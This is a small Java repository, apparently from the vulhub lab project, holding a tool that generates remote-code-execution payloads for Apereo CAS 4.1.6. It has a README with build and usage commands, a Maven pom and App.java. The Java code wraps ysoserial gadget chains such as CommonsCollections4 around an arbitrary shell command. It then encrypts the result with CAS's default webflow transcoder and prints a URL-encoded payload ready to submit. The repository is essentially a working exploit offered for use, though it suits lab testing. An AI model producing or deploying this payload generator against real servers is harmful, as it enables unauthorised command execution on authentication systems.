├── .gitignore
├── README.md
├── apereo-cas-attack.iml
├── pom.xml
└── src
    └── main
        └── java
            └── org
                └── vulhub
                    └── App.java


/.gitignore:
--------------------------------------------------------------------------------
 1 | 
 2 | # Created by https://www.toptal.com/developers/gitignore/api/java,maven
 3 | # Edit at https://www.toptal.com/developers/gitignore?templates=java,maven
 4 | /.idea/
 5 | ### Java ###
 6 | # Compiled class file
 7 | *.class
 8 | 
 9 | # Log file
10 | *.log
11 | 
12 | # BlueJ files
13 | *.ctxt
14 | 
15 | # Mobile Tools for Java (J2ME)
16 | .mtj.tmp/
17 | 
18 | # Package Files #
19 | *.jar
20 | *.war
21 | *.nar
22 | *.ear
23 | *.zip
24 | *.tar.gz
25 | *.rar
26 | 
27 | # virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml
28 | hs_err_pid*
29 | 
30 | ### Maven ###
31 | target/
32 | pom.xml.tag
33 | pom.xml.releaseBackup
34 | pom.xml.versionsBackup
35 | pom.xml.next
36 | release.properties
37 | dependency-reduced-pom.xml
38 | buildNumber.properties
39 | .mvn/timing.properties
40 | # https://github.com/takari/maven-wrapper#usage-without-binary-jar
41 | .mvn/wrapper/maven-wrapper.jar
42 | 
43 | # End of https://www.toptal.com/developers/gitignore/api/java,maven
44 | /my-repo/


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Apereo-CAS attack
 2 | 
 3 | ## Download
 4 | 
 5 | [Click here](https://github.com/vulhub/Apereo-CAS-Attack/releases) to download latest binary JAR archive.
 6 | 
 7 | ## Installation
 8 | 
 9 | Steps to install:
10 | 
11 | - Download [ysoserial](https://github.com/frohoff/ysoserial) to `ysoserial-master-30099844c6-1.jar`
12 | - Install it to local maven:
13 | 
14 | ```
15 | mvn org.apache.maven.plugins:maven-install-plugin:2.5.2:install-file -Dfile=ysoserial-master-30099844c6-1.jar -DgroupId=ysoserial -DartifactId=ysoserial -Dversion=0.0.6 -Dpackaging=jar -DlocalRepositoryPath=my-repo
16 | ```
17 | 
18 | - Build JAR file:
19 | 
20 | ```
21 | mvn clean package assembly:single
22 | ```
23 | 
24 | ## Usage
25 | 
26 | Generate a `CommonsCollections4` Payload for Apereo-CAS 4.1.6:
27 | 
28 | ```
29 | java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/success"
30 | ``` 
31 | 


--------------------------------------------------------------------------------
/apereo-cas-attack.iml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <module type="JAVA_MODULE" version="4" />


--------------------------------------------------------------------------------
/pom.xml:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="UTF-8"?>
  2 | 
  3 | <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  4 |   xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
  5 |   <modelVersion>4.0.0</modelVersion>
  6 | 
  7 |   <groupId>org.vulhub</groupId>
  8 |   <artifactId>apereo-cas-attack</artifactId>
  9 |   <version>1.0-SNAPSHOT</version>
 10 | 
 11 |   <name>apereo-cas-attack</name>
 12 |   <!-- FIXME change it to the project's website -->
 13 |   <url>https://github.com/vulhub/Apereo-CAS-Attack</url>
 14 | 
 15 |   <properties>
 16 |     <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
 17 |     <maven.compiler.source>1.8</maven.compiler.source>
 18 |     <maven.compiler.target>1.8</maven.compiler.target>
 19 |   </properties>
 20 | 
 21 |   <dependencies>
 22 |     <dependency>
 23 |       <groupId>org.apereo</groupId>
 24 |       <artifactId>spring-webflow-client-repo</artifactId>
 25 |       <version>1.0.3</version>
 26 |     </dependency>
 27 |     <dependency>
 28 |       <groupId>ysoserial</groupId>
 29 |       <artifactId>ysoserial</artifactId>
 30 |       <version>0.0.6</version>
 31 |     </dependency>
 32 | 
 33 |   </dependencies>
 34 | 
 35 |   <build>
 36 |     <pluginManagement><!-- lock down plugins versions to avoid using Maven defaults (may be moved to parent pom) -->
 37 |       <plugins>
 38 |         <!-- clean lifecycle, see https://maven.apache.org/ref/current/maven-core/lifecycles.html#clean_Lifecycle -->
 39 |         <plugin>
 40 |           <artifactId>maven-clean-plugin</artifactId>
 41 |           <version>3.1.0</version>
 42 |         </plugin>
 43 |         <!-- default lifecycle, jar packaging: see https://maven.apache.org/ref/current/maven-core/default-bindings.html#Plugin_bindings_for_jar_packaging -->
 44 |         <plugin>
 45 |           <artifactId>maven-resources-plugin</artifactId>
 46 |           <version>3.0.2</version>
 47 |         </plugin>
 48 |         <plugin>
 49 |           <artifactId>maven-compiler-plugin</artifactId>
 50 |           <version>3.8.0</version>
 51 |         </plugin>
 52 |         <plugin>
 53 |           <artifactId>maven-surefire-plugin</artifactId>
 54 |           <version>2.22.1</version>
 55 |         </plugin>
 56 |         <plugin>
 57 |           <artifactId>maven-jar-plugin</artifactId>
 58 |           <version>3.0.2</version>
 59 |         </plugin>
 60 |         <plugin>
 61 |           <artifactId>maven-install-plugin</artifactId>
 62 |           <version>2.5.2</version>
 63 |         </plugin>
 64 |         <plugin>
 65 |           <artifactId>maven-deploy-plugin</artifactId>
 66 |           <version>2.8.2</version>
 67 |         </plugin>
 68 |         <!-- site lifecycle, see https://maven.apache.org/ref/current/maven-core/lifecycles.html#site_Lifecycle -->
 69 |         <plugin>
 70 |           <artifactId>maven-site-plugin</artifactId>
 71 |           <version>3.7.1</version>
 72 |         </plugin>
 73 |         <plugin>
 74 |           <artifactId>maven-project-info-reports-plugin</artifactId>
 75 |           <version>3.0.0</version>
 76 |         </plugin>
 77 |       </plugins>
 78 |     </pluginManagement>
 79 |     <plugins>
 80 |       <plugin>
 81 |         <groupId>org.apache.maven.plugins</groupId>
 82 |         <artifactId>maven-compiler-plugin</artifactId>
 83 |         <configuration>
 84 |           <source>8</source>
 85 |           <target>8</target>
 86 |         </configuration>
 87 |       </plugin>
 88 | 
 89 |       <plugin>
 90 |         <groupId>org.apache.maven.plugins</groupId>
 91 |         <artifactId>maven-assembly-plugin</artifactId>
 92 |         <configuration>
 93 |           <finalName>${project.artifactId}-${project.version}-all</finalName>
 94 |           <!-- get all project dependencies -->
 95 |           <descriptorRefs>
 96 |             <descriptorRef>jar-with-dependencies</descriptorRef>
 97 |           </descriptorRefs>
 98 |           <!-- MainClass in mainfest make a executable jar -->
 99 |           <archive>
100 |             <manifest>
101 |               <mainClass>org.vulhub.App</mainClass>
102 |             </manifest>
103 |           </archive>
104 |           <appendAssemblyId>false</appendAssemblyId>
105 |         </configuration>
106 |       </plugin>
107 |     </plugins>
108 |   </build>
109 |   <repositories>
110 |     <repository>
111 |       <id>my-local-repo</id>
112 |       <url>file://${project.basedir}/my-repo</url>
113 |     </repository>
114 |   </repositories>
115 | </project>
116 | 


--------------------------------------------------------------------------------
/src/main/java/org/vulhub/App.java:
--------------------------------------------------------------------------------
 1 | package org.vulhub;
 2 | import org.apereo.spring.webflow.plugin.EncryptedTranscoder;
 3 | import sun.net.util.URLUtil;
 4 | import ysoserial.payloads.ObjectPayload;
 5 | 
 6 | import java.net.URLEncoder;
 7 | import java.util.Base64;
 8 | import java.util.UUID;
 9 | 
10 | public class App 
11 | {
12 |     public static void main( String[] args ) throws Exception
13 |     {
14 |         String type = args[0];
15 |         String command = args[1];
16 |         String id = UUID.randomUUID().toString();
17 |         EncryptedTranscoder et = new EncryptedTranscoder();
18 |         Object obj = ObjectPayload.Utils.makePayloadObject(type, command);
19 |         byte[] code = et.encode(obj);
20 |         String payload =  Base64.getEncoder().encodeToString(code);
21 | 
22 |         String data = URLEncoder.encode(id + "_" + payload, "UTF-8");
23 |         System.out.println(data);
24 |     }
25 | }
26 | 


--------------------------------------------------------------------------------